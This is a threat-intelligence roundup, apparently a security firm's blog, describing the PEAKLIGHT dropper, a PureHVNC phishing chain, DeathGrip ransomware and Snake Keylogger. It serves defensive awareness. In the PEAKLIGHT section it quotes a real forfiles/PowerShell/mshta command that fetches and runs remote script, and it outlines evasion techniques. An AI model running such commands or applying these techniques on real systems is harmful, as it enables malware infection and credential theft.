The global cyber threat landscape remains highly elevated, with significant impacts on organizations of all sizes and sectors. Attackers relentlessly seek out vulnerable targets, many of which are in industries that have historically underinvested in cybersecurity defenses. As these malicious actors hone their strategies, the impact of each attack becomes more severe, especially as they set their sights on higher value targets.
The top four threats occurring over the past month were:
PEAKLIGHT: Decrypting Stealthy Memory-Only Malware
Mandiant has discovered a malware-as-a-service infostealer delivery campaign featuring a memory-only dropper/downloader called “Peaklight.” Payloads include LUMMAC.V2, ShadowLadder, and CryptBot. What’s interesting is that the vector is a .lnk shortcut file that pulls a memory-only obfuscated JavaScript dropper.
In most cases, the chain begins with a manual user download, in this case a .zip file disguised as a pirated movie. The archive contains a .lnk file claiming to be a movie. In one variation, the parameters portion of the file leverages the Microsoft utility forfiles.exe to search win.ini and execute a PowerShell script. The command forfiles.exe /p C:\Windows /m win.ini /c “powershell . mshta https://nexto max.b- cdn(.)net/nexto” is executed. Windows Media Player then opens and plays the movie studio’s opening logo reel. It is a simple video.mp4 file. This appears to be a way to minimize any concerns the victim may have about the nature of the download.
The JavaScript dropper itself runs only in memory, making it effective at evading many EDR solutions. The decoding is done after assigning the decimal-encoded ASCII characters to randomly named variables, which are then converted to ASCII characters with the String.fromCharCode() function.
There are two variations of the payload, one is hex encoded and the other is Base64. In the case of the hex payload, the first command hides itself using a string of hex characters. The chain starts with a stealthy launch of Powershell with -ep Unrestricted, which skips loading the user profile, leverages a custom function to convert the string to a byte array (a data storage format), creates an AES decryptor with another hex key, and decrypts the byte array to reveal the actual PowerShell command, which is then executed.
From here, Peaklight itself executes – it’s a Powershell downloader that looks for hardcoded filenames, and if they don’t exist, downloads them to $env:AppData as L1.zip, L2.zip, etc., then executes them in alphabetical order and downloads the image (video.mp4).
These final payloads are extracted to Setup.exe and LiteSkin Utils.dll/Bentonite.cfg respectively. Setup.exe is actually a Cryptobot infostealer and Bentonite has malicious configuration for Shadowladder. LiteSkinUtils.dll is used by Shadowladder for DLL sideloading. Video.mp4 is a legitimate movie trailer to trick victims.
This threat campaign used numerous layers of obfuscation and evasion, highlighting the importance of defense in depth and knowledge sharing between blue teams to best counter such complex and evolving attacks in the current cyber environment.
Pure HVNC
In April, FortiGuard Labs discovered a sophisticated attack campaign using multiple obfuscation and evasion techniques to distribute VenomRAT via ScrubCrypt. The attack did not stop with VenomRAT, as subsequent plugins continued to deploy various malware into victim environments.
Recently, a phishing campaign was discovered using a similar attack chain, targeting employees posing as customers seeking services. The campaign used urgent messages to trick victims into opening malicious HTML attachments, launching a complex, multi-stage attack involving a variety of malware, including XWorm, Venom RAT, AsyncRAT, and PureHVNC. The malware in this campaign used advanced packing and obfuscation techniques, including the Python obfuscator “Kramer,” the shellcode generator “donut,” and the shellcode loader “laZzzy,” to evade detection.
The email tricks recipients into opening an HTML attachment that utilizes the “search-ms” functionality to query for a remote LNK file disguised as a PDF icon, and once executed, executes an obfuscated batch file via conhost.exe that downloads additional malicious payloads, including a Python program that uses Base64 decoding, RC4 encryption, and shellcode execution to carry out the attack.
The malware in this campaign contained a .NET application that decrypted and executed the payload using AES and Gzip. The malware also communicated with a C2 server to gather victim information and target specific applications such as cryptocurrency wallets and password managers. Malware plugins such as “PluginRemoteDesktop” and “PluginExecuting” facilitated further attacks, including remote desktop access and the execution of additional malicious files.
Overall, this campaign demonstrates the use of complex, multi-layered obfuscation and public hacking tools to deploy a variety of malware to evade detection and target sensitive information within victim environments.
DeathGrip ransomware
The rise of DeathGrip ransomware reflects a disturbing trend in the cybersecurity sector: the barrier to entry for cybercriminals is falling. Launched in June 2024, DeathGrip operates as a Ransomware-as-a-Service (RaaS), providing advanced ransomware tools, such as LockBit 3.0 and Yashma/Chaos builders, to a wide range of users on the dark web. The service makes it possible for anyone with little technical expertise to carry out sophisticated ransomware attacks, contributing to the commoditization of ransomware.
DeathGrip’s operations are heavily promoted through Telegram and underground forums, and it has quickly gained notoriety in the cybercrime community. The ransomware is distributed via self-extracting WinRAR bundles that retrieve and execute a payload from a remote server. These payloads employ AES-256 CGM encryption and are designed with advanced security evasion techniques, including UAC bypass and anti-debugger countermeasures, making them difficult to detect and recover from.
DeathGrip’s ransom demands are relatively low, typically in the $100 to $1,000 range, suggesting a strategy focused on mass victimization rather than targeting high-value organizations. This model has already caused significant disruption, including an attack on Indonesia’s national data center.
The widespread availability of these tools has democratized access to ransomware, allowing smaller threat actors to carry out attacks previously limited to more sophisticated groups. As these tools become more accessible, the frequency and impact of ransomware attacks is expected to increase, creating greater challenges for cybersecurity defenses. This highlights the need for advanced security solutions in an increasingly hostile digital environment, and the need for enterprises to plan defenses that can detect and mitigate threats associated with DeathGrip ransomware.
Snake keylogger distributed via phishing campaigns
Fortinet’s FortiGuard Labs recently identified a phishing campaign in which malicious Excel documents attached to emails were delivering a new variant of Snake Keylogger. Snake Keylogger, also known as the “404 Keylogger” or “KrakenKeylogger,” is a .NET-based subscription-based keylogger originally sold on hacker forums. It is capable of stealing sensitive data, logging keystrokes, and capturing screenshots on victim’s computers.
The phishing email tricks the recipient into opening a malicious Excel document that downloads and executes the Snake keylogger using anti-analysis techniques to avoid detection. The decoded JavaScript code runs, downloading and running an executable (sahost.exe) that extracts, decrypts, loads and executes the keylogger using multi-layered protection techniques to evade cyber security products.
The loader module (sahost.exe) employs several methods to protect the core keylogger module, including translation, encryption, and process hollowing (injecting malicious code into a new process to hide its origin).
Snake Keylogger’s core module is completely hidden and is capable of collecting many types of personal and sensitive information, including saved credentials, keystrokes, screenshots, and clipboard data.
Credentials harvested from over 50 software programs were sent to the attackers via SMTP, revealing the keylogger’s extensive data-stealing capabilities.
This is another example of how a company is only as strong as its weakest link. Before clicking on any link in an email, always make sure it’s legitimate by hovering your mouse over the link and reading the URL. And if you come across a potential phishing email, be sure to report it – you’re probably not the only one who has received it.
If you are facing challenges related to cybersecurity threats, breaches, or malicious actors, or would like to learn more about identifying potential threats to your organization, contact Marcum Technology today.
